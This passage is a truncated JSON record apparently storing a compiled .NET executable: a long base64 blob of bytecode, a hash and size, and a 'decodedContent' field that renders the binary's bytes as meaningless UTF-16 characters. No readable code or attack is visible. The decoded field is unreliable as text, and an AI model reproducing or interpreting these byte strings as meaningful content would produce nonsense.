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AAbbwMAAArcKgEQAAACADgAHVUADgAAAAAbMAQAjgIAAGYAABEDF42/AAABExMRExZyWwYAcKIRE28MAgAGA3KuFgBwcj0dAHBvCwIABgoDcgwmAHAXbwkCAAYLBy0LchwmAHAongAABipz3AEABgwDcmQmAHAUbwsCAAYNCS0NA3J2JgBwFG8LAgAGDQgGb+kBAAYJLG8JF43YAAABExQRFBYfLJ0RFG+hAQAKExUWExYrShEVERaaEwQRBG96AQAKEwUCEQUotwEABhMGEQYsDwhv4AEABhEGb0UBAAorF3KGJgBwEQVyliYAcCidAAAKc1UMAAZ6ERYXWBMWERYRFY5pMq4IA3KuJgBwFm8JAgAGb+cBAAYDbwECAAZyRQYAcBIHb18BAAosFhEHKCoLAAYTCAgRCG/rAQAGOOIAAAADbwECAAZyuiYAcBIHb18BAAosXBEHKC8CAAYTBxEHF43YAAABExcRFxYfLJ0RF2+hAQAKEwkRCRMYFhMZKycRGBEZmhMKEQooaQAACi0REQooKgsABhMLCBELb+sBAAYRGRdYExkRGREYjmky0StyFhMMKCALAAZvIgsABhMNA28BAgAGcsgmAHASDm9fAQAKLA4RDigqCwAGbyILAAYTDANvAQIABnLaJgBwEg9vXwEACiwOEQ8oKgsABm8iCwAGEw0RDBMQKxMIERAoKQsABm/rAQAGERAXWBMQERARDTHnA28DAgAGKCwAACsTERERb5oBAAoTGitWEhoomwEAChMSERJv/wEABihrAAAKb5gBAAolExssNxEbcuwmAHAomQEACi0QERty/CYAcCiZAQAKLQ0rGQIIERIoOwIABisOAhESCG/iAQAGKDoCAAYSGiicAQAKLaHeDhIa/hZ+AAAbbwMAAArcBAhvJAEACioAAAEQAAACABUCY3gCDgAAAAAbMAQAfwAAAGcAABEEF42/AAABEwQRBBZyCicAcKIRBG8MAgAGBG8DAgAGKCwAACsKBm+aAQAKEwUrNhIFKJsBAAoLB2//AQAGDAIoFwIABm9lAQAGCG+iAQAKDQIJBxYoRgIABgNv5AEABglvowEAChIFKJwBAAotwd4OEgX+Fn4AABtvAwAACtwqAAEQAAACAC0AQ3AADgAAAAATMAQARwAAAGgAABEDF42/AAABDAgWchonAHCiCG8MAgAGA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\", \"contentHash\": {\"sha256\": \"2d12874ce5eff797003e69815c70c9dce5876e4062e3162c3bad65d20831d5cb\"}, \"originalSize\": \"612864\", \"appName\": \"DotNet\", \"decodedContent\": \"\\u5a4d\\u0090\\u0003\\u0000\\u0004\\u0000\\uffff\\u0000\\u00b8\\u0000\\u0000\\u0000@\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0080\\u0000\\u1f0e\\u0eba\\ub400\\ucd09\\ub821\\u4c01\\u21cd\\u6854\\u7369\\u7020\\u6f72\\u7267\\u6d61\\u6320\\u6e61\\u6f6e\\u2074\\u6562\\u7220\\u6e75\\u6920\\u206e\\u4f44\\u2053\\u6f6d\\u6564\\u0d2e\\u0a0d$\\u0000\\u0000\\u0000\\u4550\\u0000\\u014c\\u0003\\ueb01\\u5a95\\u0000\\u0000\\u0000\\u0000\\u00e0\\u2102\\u010b\\u000b\\u5200\\t\\u0600\\u0000\\u0000\\u0000\\u70ae\\t\\u2000\\u0000\\u8000\\t\\u0000\\u1000\\u2000\\u0000\\u0200\\u0000\\u0004\\u0000\\u0000\\u0000\\u0006\\u0000\\u0000\\u0000\\uc000\\t\\u0200\\u0000\\u9006\\t\\u0003\\u8560\\u0000\\u0010\\u1000\\u0000\\u0000\\u0010\\u1000\\u0000\\u0000\\u0000\\u0010\\u0000\\u0000\\u0000\\u0000\\u0000\\u7058\\tS\\u0000\\u8000\\t\\u03f0\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ua000\\t\\f\\u0000\\u6f20\\t\\u001c\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u2000\\u0000\\b\\u0000\\u0000\\u0000\\u0000\\u0000\\u2008\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u742e\\u7865t\\u0000\\u50b4\\t\\u2000\\u0000\\u5200\\t\\u0200\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000 \\u6000\\u722e\\u7273c\\u0000\\u03f0\\u0000\\u8000\\t\\u0400\\u0000\\u5400\\t\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000@\\u4000\\u722e\\u6c65\\u636f\\u0000\\f\\u0000\\ua000\\t\\u0200\\u0000\\u5800\\t\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000@\\u4200\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u7090\\t\\u0000\\u0000H\\u0000\\u0002\\u0005\\uc3ac\\u0003\\uab74\\u0005\\t\\u0000\\u0000\\u0000\\ub900\\u0002\\u0aaa\\u0001\\u2050\\u0000\\u0080\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ue6a3\\u8233\\ufffd\\uffc6\\ubf62\\u5231\\u2bf1\\uc246\\u28c3\\ua650\\ue501\\uc6a7\\uf8fd\\uba71\\u78c1\\u6a88\\u1eba\\u07ac\\u1acf\\u9528\\uc041\\u1735\\u105b\\ube12\\u6429\\ucc1c\\ubb66\\u725d\\ue31e\\u0462\\ub239\\uc676\\ubeee\\u4969\\ucdb5\\u5b42\\u25a9\\uc392\\u5d50\\u99c8\\ue5c4\\uba43\\u02db\\u6210\\u8997\\uc1db\\u05e3\\u0107\\u113d\\u05fc\\u6fc3\\ub335\\uf0be\\u171e\\ub204\\u565f\\u4bb8\\u1e51\\u3276\\u32f2\\ud6c2\\ufffd\\u7254\\u2e32\\u021e\\u2428\\u0000\\u2a0a\\u021e\\u2428\\u0000\\u2a0a\\u023a\\u2428\\u0000\\u020a\\u2803\\u0005\\u0600\\u1e2a\\u7b02\\u0001\\u0400\\u222a\\u0302\\u017d\\u0000\\u2a04\\u021e\\u2428\\u0000\\u2a0a\\u021e\\u2428\\u0000\\u2a0a\\u023a\\u2428\\u0000\\u020a\\u2803\\n\\u0600\\u1e2a\\u7b02\\u0002\\u0400\\u222a\\u0302\\u027d\\u0000\\u2a04\\u0226\\u1603\\u0c28\\u0000\\u2a06\\u0256\\u2428\\u0000\\u020a\\u2803\\u000e\\u0600\\u0402\\u1028\\u0000\\u2a06\\u021e\\u037b\\u0000\\u2a04\\u0222\\u7d03\\u0003\\u0400\\u1e2a\\u7b02\\u0004\\u0400\\u222a\\u0302\\u047d\\u0000\\u2a04\\u0222\\u2817\\u0012\\u0600\\u3a2a\\u2802$\\u0a00\\u0302\\u1428\\u0000\\u2a06\\u021e\\u057b\\u0000\\u2a04\\u0222\\u7d03\\u0005\\u0400\\u1e2a\\u2802$\\u0a00\\u3a2a\\u2802$\\u0a00\\u0302\\u1828\\u0000\\u2a06\\u021e\\u067b\\u0000\\u2a04\\u0222\\u7d03\\u0006\\u0400\\u262a\\u1d02\\u2817\\u001c\\u0600\\u262a\\u0302\\u2817\\u001c\\u0600\\u262a\\u1d02\\u2803\\u001c\\u0600\\u562a\\u2802$\\u0a00\\u0302\\u1e28\\u0000\\u0206\\u2804 \\u0600\\u1e2a\\u7b02\\u0007\\u0400\\u222a\\u0302\\u077d\\u0000\\u2a04\\u021e\\u087b\\u0000\\u2a04\\u0222\\u7d03\\b\\u0400\\u262a\\u1d02\\u2817$\\u0600\\u262a\\u0302\\u2817$\\u0600\\u262a\\u1d02\\u2803$\\u0600\\u562a\\u2802$\\u0a00\\u0302\\u2628\\u0000\\u0206\\u2804(\\u0600\\u1e2a\\u7b02\\t\\u0400\\u222a\\u0302\\u097d\\u0000\\u2a04\\u021e\\u0a7b\\u0000\\u2a04\\u0222\\u7d03\\n\\u0400\\u1e2a\\u2802$\\u0a00\\u3a2a\\u2802$\\u0a00\\u0302\\u2c28\\u0000\\u2a06\\u021e\\u167b\\u0000\\u2a04\\u0222\\u7d03\\u0016\\u0400\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802$\\u0a00\\u3a2a\\u2802$\\u0a00\\u0302\\u3228\\u0000\\u2a06\\u021e\\u177b\\u0000\\u2a04\\u0222\\u7d03\\u0017\\u0400\\u1e2a\\u2802$\\u0a00\\u3a2a\\u2802$\\u0a00\\u0302\\u3628\\u0000\\u2a06\\u021e\\u187b\\u0000\\u2a04\\u0222\\u7d03\\u0018\\u0400\\u1e2a\\u2802/\\u0600\\u3a2a\\u2802/\\u0600\\u0302\\u3a28\\u0000\\u2a06\\u021e\\u197b\\u0000\\u2a04\\u0222\\u7d03\\u0019\\u0400\\u1e2a\\u2802$\\u0a00\\u3a2a\\u2802$\\u0a00\\u0302\\u3e28\\u0000\\u2a06\\u021e\\u1a7b\\u0000\\u2a04\\u0222\\u7d03\\u001a\\u0400\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802/\\u0600\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802/\\u0600\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802$\\u0a00\\u3a2a\\u2802$\\u0a00\\u0302\\u4b28\\u0000\\u2a06\\u021e\\u1b7b\\u0000\\u2a04\\u0222\\u7d03\\u001b\\u0400\\u3a2a\\u2802$\\u0a00\\u0302\\u4e28\\u0000\\u2a06\\u021e\\u1c7b\\u0000\\u2a04\\u0222\\u7d03\\u001c\\u0400\\u1e2a\\u2802$\\u0a00\\u1e2a\\u2802'\\u0a00*\\u3003\\u0003L\\u0000\\u0000\\u0000\\u2c03\\u020d\\u287b\\u0000\\u030a\\u516f\\u0000\\u2a06\\u7b02)\\u0a00\\u2a6f\\u0000\\u2d0a\\u020d\\u287b\\u0000\\u140a\\u516f\\u0000\\u2a06\\u7b02+\\u0a00\\u7b02)\\u0a00\\u2c6f\\u0000\\u020a\\u2d7b\\u0000\\u280aZ\\u0600\\u2e6f\\u0000\\u2a0a\\u3013\\u0003W\\u0000\\u0001\\u1100\\u2f73\\u0000\\u0a0a\\u0306\\u307d\\u0000\\u060a\\u7d041\\u0a00\\u0606\\u317b\\u0000\\u280a\\u0001\